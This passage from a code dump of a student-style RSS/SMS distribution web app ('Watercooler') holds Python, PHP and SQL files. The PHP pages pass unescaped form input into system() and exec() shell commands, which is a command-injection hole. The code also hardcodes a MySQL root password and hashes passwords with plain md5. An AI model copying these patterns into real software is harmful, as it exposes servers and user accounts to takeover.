\"\"\"(Internal Use) Send the stories in the given feed to the given user\n\n \"\"\"\n \n # Rename variables\n entries_URL = feed[1]\n entries_titles = feed[2]\n entries_contents = feed[3]\n\n phoneNum = user[2]\n provider = user[3]\n send_method = user[4]\n \n numEntries = len(entries_titles)\n \n # Send each story to given user. I assume that there are same number of \n # entries_URL, entries_titles, and entries_contents are the same.\n for index in range(numEntries):\n if send_method == \"sms_text\":\n sendAsText(phoneNum, provider, entries_titles[index], \\\n entries_contents[index])\n elif send_method == \"sms_link\":\n sendAsText(phoneNum, provider, entries_titles[index], \\\n entries_URL[index])\n\ndef sendStories(listOfFeeds):\n \"\"\"(API) Send the stories in the list of feeds to the subscribers\n\n For each of the listOfFeeds, sendStories will pull a list of users \n who subscribe to that feed. Then, it will send the stories to users\n based on the receiver's perfer receiving method.\n \"\"\"\n for feed in listOfFeeds:\n \n # Rename variables \n feedURL = feed[0]\n entries_URL = feed[1]\n entries_titles = feed[2]\n entries_contents = feed[3]\n \n listOfUsers = Database.getUsersBySourceURL(feedURL)\n print 'LC DEBUG EM 158, LIST OF USERS: '\n print str(listOfUsers), '\\n'\n for user in listOfUsers:\n\n # Rename variables\n username = user[0]\n emailAddr = user[1]\n phone = user[2]\n carrier = user[3]\n send_method = user[4] \n\n # Check the users' status\n emailStatusList = Database.getEmailStatusByUsername(username)\n emailStatus = emailStatusList[0][0] \n\n textStatusList = Database.getPhoneStatusByUsername(username)\n textStatus = textStatusList[0][0]\n \n # Send stories based on user's prefer method\n if emailStatus != 0:\n print 'LC DEBUG EM 178, emailStatus != 0, NO SENT for ', username, ' ||| '\n\n if send_method == \"email\" and emailStatus == 0:\n print 'LC DEBUG EM 181, sending email to ', username, ' ||| '\n message = formatEmail(feed, emailAddr)\n sendAsEmail(emailAddr, message)\n\n if send_method == \"sms_text\" and textStatus == 0:\n print 'LC DEBUG EM 186, sending text sms to ', username, ' ||| '\n sendFeedAsSMS(feed, user)\n\n if send_method == \"sms_link\" and textStatus == 0:\n print 'LC DEBUG EM 190, sending link sms to ', username, ' ||| '\n sendFeedAsSMS(feed, user)\n\ndef sendConfirmEmail(link, username, emailAddr):\n \"\"\"(API) Send confirmation Email to user\n \n All inputs are strings. Link is the link you want user to click. \n \"\"\"\n # Construct the message body\n message = MIMEMultipart()\n message['Subject'] = \"Please confirm your Email address\"\n message['From'] = SENDER\n message['To'] = emailAddr\n \n # Form an html form of the email body \n body = \"<html><head></head><body>\"\n \n content = \"Hello \" + username + \",<br /><br />Thank you for using Watercooler. Please click on the link below to confirm your Email address:<br \\><br \\><a href=\\\"\" + link + \"\\\">Confirm</a>\"\n \n body += content\n body += \"</body></html>\"\n message.attach(MIMEText(body, \"html\"))\n \n sendAsEmail(emailAddr, message)\n\ndef sendConfirmSMS(phoneNum, provider, username, pin):\n \"\"\"(API) Send confirmation SMS to user\n \n All inputs are strings, including pin.\n \"\"\"\n # Form body of message\n subject = \"PIN:\" + pin\n content = \"Thank you for using Watercooler. Please enter this pin in your settings page.\"\n \n # Send message as SMS\n sendAsText(phoneNum, provider, subject, content)\n\n\n" }, { "alpha_fraction": 0.6086777448654175, "alphanum_fraction": 0.6158749461174011, "avg_line_length": 31.858108520507812, "blob_id": "b1448e7f12bfd40506e9db987e42f2a7b373d414", "content_id": "c2bd82a38d5369a6fcb83de6f3be51d600866a42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 4863, "license_type": "no_license", "max_line_length": 174, "num_lines": 148, "path": "/www/trunk/publisher.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\n\ninclude_once('db_init.php');\ninclude_once('common.php');\ninclude_once('auth.php');\n\n?>\n\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <link rel=\"SHORTCUT ICON\" href=\"http://geogriffin.mine.nu/watercooler/matt/watercooler-content-distribution/favicon.ico\" />\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Welcome to the Watercooler!</title>\n <link rel=\"stylesheet\" title=\"watercooler\" href=\"watercooler.css\" type=\"text/css\"/>\n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"logo\">\n\t<img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\"></img>\n </div>\n \n <form class=\"publisher\" action=\"<?php echo $_SERVER['PHP_SELF'];?>\" method=\"post\">\n\t\n\t<!-- Feed Information -->\n\t<fieldset><legend>Feed Information</legend>\n\t \n\t <!-- Title -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for \"feedTitle\">Feed Title</label>\n\t <input class=\"middleCol\" id=\"feedTitle\" type=\"text\" name=\"feedTitle\" maxlength=\"100\" />\n\t </div>\n\t \n\t <!-- Website -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for \"feedWebsite\">Feed Website</label>\n\t <input class=\"middleCol\" id=\"feedWebsite\" type=\"text\" name=\"feedWebsite\" maxlength=\"100\" />\n\t </div>\n\t \n\t <!-- Description -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for \"feedDescription\">Feed Description</label>\n\t <textarea class=\"middleCol\" rows=\"5\" id=\"feedDescription\" name=\"feedDescription\" maxlength=\"160\" style=\"height:5em;\" ></textarea>\n\t </div>\n\t</fieldset>\n\n\t<!-- New Story -->\n\t<fieldset class=\"publisher\"><legend>New Story</legend>\n\n\t <!-- Title -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"storyTitle\">Title</label>\n\t <input class=\"middleCol\" type=\"text\" id=\"storyTitle\" name=\"storyTitle\" maxlength=\"100\" />\n\t </div>\n\n\t <!-- Link -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"storyLink\">Link</label>\n\t <input class=\"middleCol\" type=\"text\" id=\"storyLink\" name=\"storyLink\" maxlength=\"100\" />\n\t </div>\n\n\t <!-- Description -->\n\t <div class=\"lineWidth\">\n\t <label class=\"leftCol\" for=\"storyDescription\">Description</label>\n\t <textarea class=\"middleCol\" rows=\"5\" id=\"storyDescription\" name=\"storyDescription\" maxlength=\"160\"></textarea>\n\t </div>\n\t \n\t <!-- Submit -->\n\t <div class=\"lineWidth\">\n\t <input class=\"middleCol clickable\" type=\"submit\" name=\"submit\" value=\"Publish!\" style=\"float:none; margin-left:8em; text-align:center; font-weight:bolder; height:2em;\"/>\n\t </div>\n\t</fieldset>\n </form>\n </div>\n\n<?php\n\n\n$rssString = \"/var/www/rss/{$user->username}.xml\";\n\n// set the default title\n$category = \"title\";\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$_REQUEST['feedTitle']}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// set the pubdate\n$category = \"pubdate\";\n$date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T');\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$date}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// set the default website\n$category = \"link\";\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$_REQUEST['feedWebsite']}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// set the default description\n$category = \"description\";\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$_REQUEST['feedDescription']}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// set the last build date\n$category = \"lastBuildDate\";\n$scriptString = \"sed -i 's/<!-- Feedinfo --><$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$date}<\\/$category>/g'\";\nsystem(\"{$scriptString} {$rssString}\");\n\n// remove ending\nsystem(\"sed -i '\\$d' {$rssString}\");\nsystem(\"sed -i '\\$d' {$rssString}\");\n\n// add opening item tag\n$tag = '<item>';\nsystem(\"echo \\\"{$tag}\\\" >> {$rssString}\");\n\n// add story title\n$line = \"<title>{$_REQUEST['storyTitle']}</title>\";\nsystem(\"echo \\\"{$line}\\\" >> {$rssString}\");\n\n// add link\n$line = \"<link>{$_REQUEST['storyLink']}</link>\";\nsystem(\"echo \\\"{$line}\\\" >> {$rssString}\");\n\n// add description\n$line = \"<description>{$_REQUEST['storyDescription']}</description>\";\nsystem(\"echo \\\"{$line}\\\" >> {$rssString}\");\n\n// add pubdate\n$date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T');\n$line = \"<pubdate>{$date}</pubdate>\";\nsystem(\"echo \\\"{$line}\\\" >> {$rssString}\");\n\n// add ending item tag\n$tag = '</item>';\nsystem(\"echo \\\"{$tag}\\\" >> {$rssString}\");\n\n// add ending channel tag\n$tag = '</channel>';\nsystem(\"echo \\\"{$tag}\\\" >> {$rssString}\");\n\n// add ending rss tag\n$tag = '</rss>';\nsystem(\"echo \\\"{$tag}\\\" >> {$rssString}\");\n\n?>\n\n </body>\n</html>\n" }, { "alpha_fraction": 0.5814497470855713, "alphanum_fraction": 0.5931410789489746, "avg_line_length": 34.61111068725586, "blob_id": "c807832e4aa46ba1861906c25d5a41c03c4535e9", "content_id": "92fee59dca3a09d5e63e51613210bef71f1a28ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1283, "license_type": "no_license", "max_line_length": 96, "num_lines": 36, "path": "/www/trunk/Database.py", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.6\n\nimport sys\nimport MySQLdb\n\n# parameters:\n# my_feed_url = (string) feed entry url\n# return:\n# python list of tuples of strings of usernames of each user who needs this story\n# [(username, email, phone, carrior, method), (username2, email2, phone2, carrior, method).....]\n# phone: (string): 909-802-8597\n# carrior: (string): AT&T, Verizon, T-Mobile, Sprint\n# method: (string): email, sms_text, sms_link\ndef getUsersBySourceURL ( my_source_url ):\n \n conn = MySQLdb.connect (host = \"localhost\",\n user = \"root\",\n passwd = \"adminsql\",\n db = \"watercooler\")\n \n cursor = conn.cursor ()\n cursor.execute (\"\"\"\n SELECT username, email, phone_number, carrior_name, method_type\n FROM users, favorites, feed_sources, carriors, receptions, reception_methods\n WHERE users.uid = favorites.uid\n AND users.cid = carriors.cid\n AND users.uid = receptions.uid\n AND receptions.rid = reception_methods.rid\n AND feed_sources.sid = favorites.sid\n AND feed_sources.source_url = %s\n \"\"\", my_source_url)\n retVal = cursor.fetchall ()\n cursor.close ()\n conn.close ()\n \n return retVal\n\n" }, { "alpha_fraction": 0.588790237903595, "alphanum_fraction": 0.600443959236145, "avg_line_length": 34.25490188598633, "blob_id": "c93ff1cc67e2d634ace545e5dca155373e756682", "content_id": "60cc1eef2e367a714e46d532af33db1932976663", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1802, "license_type": "no_license", "max_line_length": 148, "num_lines": 51, "path": "/www/trunk/index.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('auth.php');\nif (!isset($user)) {\n?>\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <link rel=\"SHORTCUT ICON\" href=\"http://geogriffin.mine.nu/watercooler/matt/watercooler-content-distribution/favicon.ico\" />\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Welcome to the Watercooler!</title>\n <link rel=\"stylesheet\" title=\"watercooler\" href=\"watercooler.css\" type=\"text/css\"/>\n <script type=\"text/JavaScript\" src=\"http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js\">\n $(document).ready(function(){$('#userName').focus();});\n </script>\n \n </head>\n <body>\n <div id=\"wrap\">\n <div id=\"logo\">\n\t<a href=\"index.php\"><img src=\"watercooler_logo.png\" alt=\"Welcome to the Watercooler\" /></a>\n </div>\n <form action=\"login.php\" method=\"post\">\n <fieldset class=\"thin\"><legend>Watercooler</legend>\n\t <p class=\"thin\">\n <label for=\"userName\">username</label>\n <input type=\"text\" id=\"userName\"name=\"userName\" />\n </p>\n\t <p class=\"thin\">\n\t <label for=\"userPassword\">password</label>\n <input type=\"password\" name=\"userPassword\" />\n\t </p>\n\t <p class=\"submit\">\n\t <input type=\"submit\" value=\"Login\" \n\t\t name=\"submit\" />\n\t </p>\n </fieldset>\n </form>\n <div>Need an account?</div>\n <div>\n\t<a href=\"signup.php\">Sign up!</a>\n </div>\n </div>\n <div class=\"validated\">\n <a href=\"http://validator.w3.org/check?uri=referer\"><img src=\"http://www.w3.org/Icons/valid-xhtml10\" alt=\"Valid XHTML 1.0 Strict\" /></a></div>\n </body>\n</html>\n<?php\n } else {\n include(\"homepage.php\");\n }\n \n" }, { "alpha_fraction": 0.5863789319992065, "alphanum_fraction": 0.591019868850708, "avg_line_length": 30.08664321899414, "blob_id": "8dcef011db8e84d3be4dccd596ea3c746c8653c6", "content_id": "667012240c927d10b8f6f5de14009d44f559cb2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 8619, "license_type": "no_license", "max_line_length": 187, "num_lines": 277, "path": "/www/trunk/verifySignup.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": " \n <?php\n\n /**\n * This function can be used to check the sanity of variables\n * @param string $type The type of variable can be bool, float, numeric, string, array, or object\n *| @param string $string The variable name you would like to check\n * @param string $length The maximum length of the variable\n *\n * return bool\n */\n function sanityCheck($string, $type, $length){\n\n // assign the type\n $type = 'is_'.$type;\n \n if(!$type($string))\n\t {\n\t return FALSE;\n\t }\n // now we see if there is anything in the string\n elseif(empty($string))\n\t {\n\t return FALSE;\n\t }\n // then we check how long the string is\n elseif(strlen($string) > $length)\n\t {\n\t return FALSE;\n\t }\nelse\n {\n // if all is well, we return TRUE\n return TRUE;\n }\n }\n\n // check ALL the REQUEST variables\nfunction checkSet()\n{\n return isset($_REQUEST['userName'], $_REQUEST['userPassword'], $_REQUEST['userRepeatPass'], $_REQUEST['userEmail'], $_REQUEST['userCell'], $_REQUEST['userCarrier']);\n}\n\nfunction checkEmail($email)\n{\n return preg_match('/^\\S+@[\\w\\d.-]{2,}\\.[\\w]{2,6}$/iU', $email) ? TRUE : FALSE;\n}\n\n// check all our variables are set\nif(checkSet() != FALSE)\n {\n // Sanity check the username variable.\n\n if(empty($_REQUEST['userName'])==FALSE && sanityCheck($_REQUEST['userName'], 'string', 25) != FALSE)\n {\n\tif(User::find('username',$_REQUEST['userName']) != NULL)\n\t {\n\t echo '<p style=\"color:red\">Username is already in use. Please try another username.</p>';\n\t exit();\n\t }\n\telse\n\t {\n\t $userName = $_REQUEST['userName'];\n\t }\n }\n else\n {\n echo '<p style=\"color:red\">Username is not set</p>';\n\t$_REQUEST['userName'] = '';\n exit();\n }\n\n // *************** TODO **************\n // *Verify that username is available*\n // ***********************************\n\n // Validate the password input\n if(empty($_REQUEST['userPassword'])==FALSE && sanityCheck($_REQUEST['userPassword'], 'string', 10) != FALSE)\n {\n\tif (strlen($_REQUEST['userPassword']) < 6)\n\t {\n\t echo '<p style=\"color:red\">Please choose a password of at least 6 characters</p>';\n\t $_REQUEST['userPassword'] = '';\n\t exit();\n\t }\n\telse\n\t {\n\t $userPassword = $_REQUEST['userPassword'];\n\t }\n }\n else\n {\n echo '<p style=\"color:red\">Please enter a valid Password</p>';\n\t$_REQUEST['userPassword'] = '';\n exit();\n }\n\n // Make sure that the two password entries are identical\n if (empty($_REQUEST['userRepeatPass'])==FALSE && sanityCheck($_REQUEST['userRepeatPass'], 'string', 10) != FALSE)\n {\n\t$userRepeatPass = $_REQUEST['userRepeatPass'];\n\tif ($userPassword != $userRepeatPass)\n\t {\n\t echo '<p style=\"color:red\">Password mismatch. Please re-enter your password.</p>';\n\t exit();\n\t }\n }\n else\n {\n\techo '<p style=\"color:red\">Please enter your password again in the Repeat Password field.</p>';\n\texit();\n }\n\n // Make sure that the email is syntactically valid\n if (empty($_REQUEST['userEmail'])==FALSE && sanityCheck($_REQUEST['userEmail'], 'string', 50) != FALSE)\n {\n\tif (checkEmail($_REQUEST['userEmail']) == FALSE)\n\t {\n\t echo '<p style=\"color:red\">Please enter a valid email address.</p>';\n\t $_REQUEST['userEmail'] = '';\n\t exit();\n\t }\n\t else\n\t {\n\t if(User::find('email',$_REQUEST['userEmail']) != NULL)\n\t\t{\n\t\t echo '<p style=\"color:red\">This email is already in use. Please use another email address.</p>';\n\t\t exit();\n\t\t}\n\t else\n\t\t{\n\t\t $userEmail = $_REQUEST['userEmail'];\n\t\t}\n\t }\n }\n else\n {\n\techo '<p style=\"color:red\">A valid email address is required to register with Watercooler.</p>';\n\texit();\n }\n\n // Validate the user's cell phone number\n if (empty($_REQUEST['userCell'])==FALSE)\n {\n\tif (sanityCheck($_REQUEST['userCell'],'numeric', 10) != FALSE)\n\t {\n\t if (strlen($_REQUEST['userCell']) != 10)\n\t {\n\t\techo '<p style=\"color:red\">A valid cell phone number must be exactly ten digits long</p>';\n\t\t$_REQUEST['userCell'] = '';\n\t\texit();\n\t }\n\t else\n\t {\n\t\tif(($this_user_object = User::find('phone_number',$_REQUEST['userCell'])) != NULL)\n\t\t {\n\t\t echo '<p style=\"color:red\">There is already an account associated with this cell phone number. If you do not own an account named ';\n\t\t $this_user_array = $this_user_object->get((array)'username');\n\t\t echo $this_user_array['username'];\n\t\t echo ', please email our <a href=\"mailto:[email protected]\">webmaster</p>';\n\t\t exit();\n\t\t }\n\t\t$userCell = $_REQUEST['userCell'];\n\t }\n\t }\n\telse\n\t {\n\t echo '<p style=\"color:red\">Please enter a valid cell phone number (only numeric characters).</p>';\n\t $_REQUEST['userCell'] = '';\n\t exit();\n\t }\n }\n else\n {\n\techo '<p style=\"color:red\">Please enter your cell phone number. Note that you will not receive text messages from Watercooler unless you select a texting reception method.</p>';\n\texit();\n }\n\n if (isset($_REQUEST['feed'])) {\n $feedinfos = array();\n foreach ($_REQUEST['feed'] as $index=>$feed)\n\tif ($feed != '')\n\t $feedinfos[] = array('name'=>$feed,'url'=>$feed);\n if (count($feedinfos) > 0)\n\t$feeds = Feeds::create($feedinfos);\n }\n\n $emailPin = mt_rand(1000,9999);\n $smsPin = mt_rand(1000,9999);\n $userInfo = array('username'=>$userName, \n\t\t 'password'=>md5($userPassword), \n\t\t 'email'=>$userEmail, \n\t\t 'phone_number'=>$userCell, \n\t\t 'carrier'=>$_REQUEST['userCarrier'], \n\t\t 'send_email'=>$_REQUEST['receive_email'] === 'yes', \n\t\t 'send_sms_text'=>$_REQUEST['receive_sms_text'] === 'yes',\n\t\t 'send_sms_link'=>$_REQUEST['receive_sms_link'] === 'yes',\n\t\t 'email_pin'=>$emailPin,\n\t\t 'phone_pin'=>0,\n\t\t 'feeds'=>$feeds);\n \n if (($user = User::create($userInfo)) == NULL)\n {\n\n\techo '<p style=\"color:red\">User registration failed.</p>';\n\texit();\n }\n\n else\n {\n\tprint('<p style=\"color:navy\">Registration Successful!</p>');\n\n\t$hyperlink = 'confirm.php' . \"?id={$user->id}&pin={$emailPin}\";\n\t$EmailConfirmationString = \"python2.5 -c \\\"import EmailServer; EmailServer.sendConfirmEmail('{$page_uri_base}{$hyperlink}','{$user->username}','{$user->email}');\\\"\";\n\texec($EmailConfirmationString);\n\t//$SMSConfirmationString = \"python2.5 -c \\\"import EmailServer; EmailServer.sendConfirmSMS('{$user->phone_number}','{$user->carrier}','{$user->username}', '{$smsPin}');\\\"\";\n\t//exec($SMSConfirmationString);\n\n\n\n\n\n\n\n\t$rssString = \"/var/www/rss/{$user->username}.xml\";\n\t$rssTemplate = \"/var/www/rss/template.xml\";\n\n\n\t// initialize the feed to the template and set permissions\n\tsystem(\"cp {$rssTemplate} {$rssString}\");\n\tsystem(\"chmod g+w {$rssString}\");\n\n\t// set the default title\n\t$category = \"title\";\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$user->username}<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the default website\n\t$category = \"link\";\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>http:\\/\\/watercooler\\.geogriffin\\.info<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the default description\n\t$category = \"description\";\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>My feed<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the publishing date\n\t$category = \"lastBuildDate\";\n\t$date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T');\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$date}<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the last build date\n\t$category = \"lastBuildDate\";\n\t$date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T');\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$date}<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\t// set the default managing editor\n\t$category = \"managingEditor\";\n\t$scriptString = \"sed -i 's/<$category>.*<\\/$category>/<!-- Feedinfo --><$category>{$user->email}<\\/$category>/g'\";\n\tsystem(\"{$scriptString} {$rssString}\");\n\n\n\n\tprint('<p>You have been sent a confirmation email and text message. Please follow the instructions in the email and text message in order to enjoy full access to the Watercooler.</p>');\n\tprint('<a href=\"index.php\">Login here.</a>');\n\theader(\"Location: {$page_uri_base}success.php?email={$user->email}&cell={$user->phone_number}\");\n }\n }\n else\n {\n // this will be the default message if the form accessed without POSTing\n echo '<p style=\"color:navy;\">Please fill in the form below</p>';\n }\n\n?>\n" }, { "alpha_fraction": 0.782187819480896, "alphanum_fraction": 0.7826718091964722, "avg_line_length": 23.595237731933594, "blob_id": "ea0e90ddf98b232a2fbf6b55574828e7c07e8301", "content_id": "06b79c91e6fb17b21e9cabded8928c2ff86de8e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 2066, "license_type": "no_license", "max_line_length": 60, "num_lines": 84, "path": "/www/trunk/SQLiteDB.sql", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "DROP TABLE IF EXISTS users;\nCREATE TABLE users\n(\nuid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\nusername TEXT NOT NULL UNIQUE,\npassword TEXT NOT NULL,\nfirst_name TEXT,\nlast_name TEXT,\nphone_number TEXT NOT NULL UNIQUE,\nemail TEXT NOT NULL UNIQUE,\nstatus INTEGER NOT NULL,\ncid INTEGER NOT NULL,\nFOREIGN KEY (cid) REFERENCES reception_methods\n);\n\nDROP TABLE IF EXISTS receptions;\nCREATE TABLE receptions\n(\nuid INTEGER NOT NULL,\nrid INTEGER NOT NULL,\nFOREIGN KEY (uid) REFERENCES users,\nFOREIGN KEY (rid) REFERENCES reception_methods\n);\n\nDROP TABLE IF EXISTS reception_methods;\nCREATE TABLE reception_methods\n(\nrid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\nmethod_type TEXT NOT NULL\n);\n\nDROP TABLE IF EXISTS carriors;\nCREATE TABLE carriors\n(\ncid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\ncarrior_name TEXT NOT NULL\n);\n\nDROP TABLE IF EXISTS favorites;\nCREATE TABLE favorites\n(\nuid INTEGER NOT NULL,\nsid INTEGER NOT NULL,\npriority INTEGER NOT NULL,\nFOREIGN KEY (uid) REFERENCES users,\nFOREIGN KEY (sid) REFERENCES feed_sources\n);\n\nDROP TABLE IF EXISTS feed_sources;\nCREATE TABLE feed_sources\n(\nsid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\nsource_name TEXT NOT NULL,\nsource_url TEXT NOT NULL\n);\n\nDROP TABLE IF EXISTS feed_stories;\nCREATE TABLE feed_stories\n(\nfid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\ntitle TEXT NOT NULL,\ncontent TEXT NOT NULL,\nurl TEXT NOT NULL,\ntime_stamp INTEGER NOT NULL,\nsid INTEGER NOT NULL,\ngid INTEGER NOT NULL,\nFOREIGN KEY (sid) REFERENCES feed_sources,\nFOREIGN KEY (gid) REFERENCES feed_categories\n);\n\nDROP TABLE IF EXISTS feed_categories;\nCREATE TABLE feed_categories\n(\ngid INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,\ncategory TEXT NOT NULL\n);\n\nINSERT INTO carriors (carrior_name) VALUES ('AT&T');\nINSERT INTO carriors (carrior_name) VALUES ('T-Mobile');\nINSERT INTO carriors (carrior_name) VALUES ('Verizon');\nINSERT INTO carriors (carrior_name) VALUES ('Sprint');\n\nINSERT INTO carriors (carrior_name) VALUES ('testcarrier');\nINSERT INTO carriors (carrior_name) VALUES ('testcarrier2');\n" }, { "alpha_fraction": 0.6383973956108093, "alphanum_fraction": 0.6391768455505371, "avg_line_length": 32.939151763916016, "blob_id": "0a50920bb70b9781553b23ec11bb37228a298825", "content_id": "f187af00d315c63ced1b816ea0cb33fb4e568a47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 12829, "license_type": "no_license", "max_line_length": 167, "num_lines": 378, "path": "/www/trunk/db_mysql_feeds.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\nrequire_once('db_mysql.php');\n\n/* class MySQLFeeds implements iFeeds on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLFeeds extends MySQLDBObject implements iFeeds {\n private $db;\n public $feeds;\n\n public function __construct(array $feeds, MySQLDB $db) {\n $this->feeds = $feeds;\n $this->db = $db;\n }\n\n/* MySQLFeeds::create implements iFeeds::create (see corresponding \n documentation)\n*/\n public static function create(array $feedinfos, iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__create($feedinfos, $db);\n }\n\n /* MySQLFeeds::__create is a helper function to MySQLFeeds::create which\n performs the actual create operation. This function was added in order to \n use typehinting on parameter $db.\n */\n private static function __create(array $feedinfos, MySQLDB $db) {\n $feeds = array();\n foreach ($feedinfos as $feedinfo) {\n if (!isset($feedinfo['url']))\n\tthrow new InvalidArgumentException('$feedinfos requires url attr');\n $feed = MySQLFeed::find('url', $feedinfo['url'], $db);\n if ($feed === NULL)\n\t$feeds[] = MySQLFeed::create($feedinfo, $db);\n else\n\t$feeds[] = $feed;\n }\n $c = __CLASS__;\n return new $c($feeds, $db);\n }\n\n/* MySQLFeeds::searchPartial implements iFeeds::searchPartial (see \n corresponding documentation)\n*/\n public static function searchPartial($attr, $partial_value,\n\t\t\t\t iDatabase $db = NULL) {\n if ($db === NULL)\n $db = self::$site_db;\n return self::__searchPartial($attr, $partial_value, $db);\n }\n\n public static function __searchPartial($attr, $partial_value,\n\t\t\t\t\t MySQLDB $db) {\n /* $valid_search_feedattrs is a list of attributes which can be used as\n the $attr parameter to this function. Keep this list updated with\n MySQLDBObject::$feedattrs_to_cols.\n */\n static $valid_search_feedattrs = \n array('name'=>TRUE, 'url'=>TRUE);\n\n if (isset($valid_search_feedattrs[$attr]))\n $db_attr = self::$feedattrs_to_cols[$attr];\n else\n throw new InvalidArgumentException('parameter $attr is not a valid '.\n\t\t\t\t\t 'attribute');\n\n $search_sql = \"SELECT sid FROM feed_sources WHERE $db_attr LIKE :value;\";\n $search_stmt = $db->pdo->prepare($search_sql);\n $search_stmt->bindValue(':value', \"%{$partial_value}%\");\n $search_stmt->execute();\n // set fetch mode to create instances of MySQLFeed\n $search_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', array($db));\n\n // fetch the result and create a new instance of this class\n $search_result = $search_stmt->fetchAll();\n if ($search_result !== FALSE) {\n $c = __CLASS__;\n return new $c($search_result, $db);\n } else\n return NULL; \n }\n\n/* MySQLFeeds::merge implements iFeeds::merge (see corresponding documentation)\n*/\n public function merge(iFeeds $feeds) {\n return self::__merge($feeds);\n }\n /* MySQLFeeds::__merge is a helper function to MySQLFeeds::merge which\n performs the actual merge operation. This function was added in order to\n use typehinting on parameter $feeds.\n */\n public function __merge(MySQLFeeds $feeds) {\n if ($this->db !== $feeds->db)\n throw new InvalidArgumentException('$db must match between objects');\n $c = __CLASS__;\n return new $c(array_merge($this->feeds, $feeds->feeds), $this->db);\n }\n\n public function sortByPopularity() {\n // XXX this is the slowest SQL query on the planet\n\n if (count($this->feeds) == 0)\n return;\n\n $get_result = array();\n\n // build SQL query\n $get_sql = \n 'SELECT feed_sources.sid, COUNT(favorites.uid) AS usercount FROM feed_sources LEFT JOIN favorites ON feed_sources.sid=favorites.sid WHERE feed_sources.sid IN (';\n // add story ids\n for ($i = 0; $i < count($this->feeds); $i++)\n $get_sql .= '?, ';\n // remove trailing comma and space\n $get_sql = substr($get_sql, 0, -2);\n // add rest of SQL query\n $get_sql .= \n ') GROUP BY feed_sources.sid ORDER BY usercount DESC;';\n\n $get_stmt = $this->db->pdo->prepare($get_sql);\n // build an array of story ids\n foreach ($this as $feed)\n $ids[] = 